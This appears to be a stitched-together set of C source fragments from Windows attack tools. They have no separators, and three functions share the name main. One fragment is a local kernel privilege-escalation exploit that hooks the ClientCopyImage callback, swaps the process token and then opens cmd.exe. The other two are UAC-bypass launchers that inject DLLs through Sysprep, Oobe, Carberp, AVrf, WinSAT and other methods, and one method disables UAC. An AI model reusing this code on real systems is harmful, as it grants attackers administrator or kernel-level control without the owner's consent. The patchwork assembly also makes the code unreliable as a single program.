/*
* ucmInit
*
* Purpose:
*
* Prestart phase.
*
*/
UINT ucmInit(
VOID
)
{
//fill common data block
RtlSecureZeroMemory(&g_ldp, sizeof(g_ldp));
//remember dll handles
g_ldp.hKernel32 = GetModuleHandleW(L"kernel32.dll");
if (g_ldp.hKernel32 == NULL) {
return ERROR_INVALID_HANDLE;
}
g_ldp.hOle32 = GetModuleHandleW(L"ole32.dll");
if (g_ldp.hOle32 == NULL) {
g_ldp.hOle32 = LoadLibraryW(L"ole32.dll");
if (g_ldp.hOle32 == NULL) {
return ERROR_INVALID_HANDLE;
}
}
g_ldp.hShell32 = GetModuleHandleW(L"shell32.dll");
if (g_ldp.hShell32 == NULL) {
g_ldp.hShell32 = LoadLibraryW(L"shell32.dll");
if (g_ldp.hShell32 == NULL) {
return ERROR_INVALID_HANDLE;
}
}
//query basic directories
if (GetSystemDirectoryW(g_ldp.szSystemDirectory, MAX_PATH) == 0) {
return ERROR_INVALID_DATA;
}
//query build number
RtlSecureZeroMemory(&g_ldp.osver, sizeof(g_ldp.osver));
g_ldp.osver.dwOSVersionInfoSize = sizeof(g_ldp.osver);
if (!NT_SUCCESS(RtlGetVersion(&g_ldp.osver))) {
return ERROR_INVALID_ACCESS;
}
g_ldp.IsWow64 = supIsProcess32bit(GetCurrentProcess());
return ERROR_SUCCESS;
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
void main()
{
PTEB teb = NtCurrentTeb();
PPEB peb = teb->ProcessEnvironmentBlock;
WNDCLASSEX wincls;
HINSTANCE hinst = GetModuleHandle(NULL);
BOOL rv = TRUE;
MSG msg1;
ATOM class_atom;
HWND MainWindow;
DWORD prot;
OSVERSIONINFOW osver;
DWORD cch;
TCHAR cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1];
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber > 7601) {
ExitProcess((UINT)-1);
return;
}
if (supIsProcess32bit(GetCurrentProcess())) {
ExitProcess((UINT)-2);
return;
}
g_OurPID = GetCurrentProcessId();
g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
#ifdef _WIN64
g_EPROCESS_TokenOffset = 0x208;
#else
g_EPROCESS_TokenOffset = 0xF8;
#endif
if (g_PsLookupProcessByProcessIdPtr == NULL) {
ExitProcess((UINT)-3);
return;
}
RtlSecureZeroMemory(&wincls, sizeof(wincls));
wincls.cbSize = sizeof(WNDCLASSEX);
wincls.lpfnWndProc = &MainWindowProc;
wincls.hIcon = LoadIcon(NULL, IDI_APPLICATION);
wincls.lpszClassName = MAINWINDOWCLASSNAME;
class_atom = RegisterClassEx(&wincls);
while (class_atom) {
g_w32theadinfo = teb->Win32ThreadInfo;
g_ppCCI = &((PVOID *)peb->KernelCallbackTable)[0x36]; // <--- User32_ClientCopyImage INDEX
if (!VirtualProtect(g_ppCCI, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &prot)) {
break;
}
g_originalCCI = InterlockedExchangePointer(g_ppCCI, &hookCCI);
MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom),
NULL, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
if (g_shellCalled == 1) {
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
if ((cch != 0) && (cch < MAX_PATH)) {
RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
}
}
}
else {
OutputDebugString(TEXT(" Failed \r\n"));
}
if (!MainWindow)
break;
do {
rv = GetMessage(&msg1, NULL, 0, 0);
if (rv == -1)
break;
TranslateMessage(&msg1);
DispatchMessage(&msg1);
} while (rv != 0);
break;
}
if (class_atom)
UnregisterClass(MAKEINTATOM(class_atom), hinst);
ExitProcess(0);
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
BOOL IsWow64 = FALSE;
DWORD bytesIO, dwType;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
RTL_OSVERSIONINFOW osver;
//verify system version
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber < 7000) {
MessageBox(GetDesktopWindow(),
TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
goto Done;
}
if (ElevType != TokenElevationTypeLimited) {
MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
IsWow64 = supIsProcess32bit(GetCurrentProcess());
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
dwType = METHOD_SYSPREP;
}
if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
dwType = METHOD_SYSPREP_EX;
}
if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
dwType = METHOD_OOBE;
}
#ifndef _WIN64
if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
dwType = METHOD_APPCOMPAT;
}
#endif
if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
dwType = METHOD_SIMDA;
}
if (lstrcmpi(szBuffer, TEXT("6")) == 0) {
OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r"));
dwType = METHOD_CARBERP;
}
if (lstrcmpi(szBuffer, TEXT("7")) == 0) {
OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r"));
dwType = METHOD_CARBERP_EX;
}
}
if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
switch (dwType) {
case METHOD_SYSPREP:
case METHOD_SYSPREP_EX:
case METHOD_OOBE:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// There is no RedirectEXE for x64.
//
#ifndef _WIN64
case METHOD_APPCOMPAT:
if (ucmAppcompatElevation()) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
if (osver.dwBuildNumber > 9600) {
MessageBoxW(GetDesktopWindow(),
TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
//there is no migmiz in syswow64 in 8+
if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
}
if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
}
Done:
ExitProcess(0);
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
BOOL IsWow64 = FALSE;
DWORD bytesIO, dwType;
WCHAR *p;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
RTL_OSVERSIONINFOW osver;
//verify system version
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber < 7000) {
MessageBox(GetDesktopWindow(),
TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
goto Done;
}
if (ElevType != TokenElevationTypeLimited) {
MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
IsWow64 = supIsProcess32bit(GetCurrentProcess());
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
dwType = strtoul(szBuffer);
switch (dwType) {
case METHOD_SYSPREP:
OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
if (osver.dwBuildNumber > 9200) {
MessageBox(GetDesktopWindow(), WINPREBLUE,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_SYSPREP_EX:
OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
if (osver.dwBuildNumber < 9600) {
MessageBox(GetDesktopWindow(), WINBLUEONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_OOBE:
OutputDebugString(TEXT("[UCM] Oobe\n\r"));
break;
case METHOD_REDIRECTEXE:
OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
#ifdef _WIN64
MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
#endif
break;
case METHOD_SIMDA:
OutputDebugString(TEXT("[UCM] Simda\n\r"));
break;
case METHOD_CARBERP:
OutputDebugString(TEXT("[UCM] Carberp\n\r"));
break;
case METHOD_CARBERP_EX:
OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
break;
case METHOD_TILON:
OutputDebugString(TEXT("[UCM] Tilon\n\r"));
if (osver.dwBuildNumber > 9200) {
MessageBox(GetDesktopWindow(), WINPREBLUE,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
break;
case METHOD_AVRF:
OutputDebugString(TEXT("[UCM] AVrf\n\r"));
break;
case METHOD_WINSAT:
OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
break;
case METHOD_SHIMPATCH:
OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
#ifdef _WIN64
MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
#endif
break;
}
}
switch (dwType) {
case METHOD_SYSPREP:
case METHOD_SYSPREP_EX:
case METHOD_OOBE:
case METHOD_TILON:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// Allow only in 32 version.
//
#ifndef _WIN64
case METHOD_REDIRECTEXE:
case METHOD_SHIMPATCH:
if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
if (osver.dwBuildNumber > 9600) {
MessageBox(GetDesktopWindow(),
TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
//there is no migmiz in syswow64 in 8+
if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
}
if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
}
if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
case METHOD_AVRF:
#ifndef _DEBUG
if (IsWow64) {
MessageBox(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
}
break;
case METHOD_WINSAT:
//
// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
//
if (IsWow64) {
MessageBox(GetDesktopWindow(),
TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
if (osver.dwBuildNumber < 9200) {
p = L"powrprof.dll";
}
else {
p = L"devobj.dll";
}
if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
}
break;
}
Done:
ExitProcess(0);
}
